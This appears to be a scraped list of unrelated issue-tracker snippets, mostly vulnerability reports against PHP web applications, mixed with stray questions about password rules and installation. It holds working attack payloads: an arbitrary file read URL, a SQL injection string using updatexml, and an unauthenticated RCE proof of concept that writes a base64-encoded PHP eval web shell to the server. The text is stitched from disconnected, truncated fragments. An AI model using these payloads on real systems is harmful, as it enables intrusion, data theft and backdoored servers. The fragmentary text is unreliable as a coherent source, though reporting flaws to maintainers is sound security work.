liao10086
Is there one with mixed upper- and lowercase?
Many registrations nowadays require a mix of upper- and lowercase.
I found an arbitrary file read vulnerability in V1.3, in the error log module. URL: http://localhost/index.php?m=admin&c=Tool&a=log&file=D%3A%5CphpStudy%5CWWW%5CSkycaijiApp%5CRuntime%5CLogs%5CAdmin%5C18_09_13.log The file parameter can be controlled, for example to read index.php. POC: Suggestion: limit the parameter...
Hi: I found a SQL injection vulnerability in /coreframe/app/order/admin/index.php. The parameter 'flag' does not filter harmful input, so I can inject SQL. Payload like this: http://127.0.0.1/index.php?m=order&f=index&v=listing&_su=wuzhicms&flag= xxxx' or updatexml(1,concat(0x7e,(version())),0) or...
Version: sftnow through 2018-12-29. There is a Remote Code Execution vulnerability without login. Because the thinkcmf version used by the framework is too low, it includes an RCE vulnerability. POC:

```txt
http://127.0.0.1:8888/?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('she.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ3gnXSk7Pz4='))
```

...
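Original request  After generating the POC  Also, how do I customize the command here? The default is whoami; the target machine I am testing gives no echo, so I want to change it to another command for testing.
The request is invalid during installation. Everything was filled in correctly and the environment is fine.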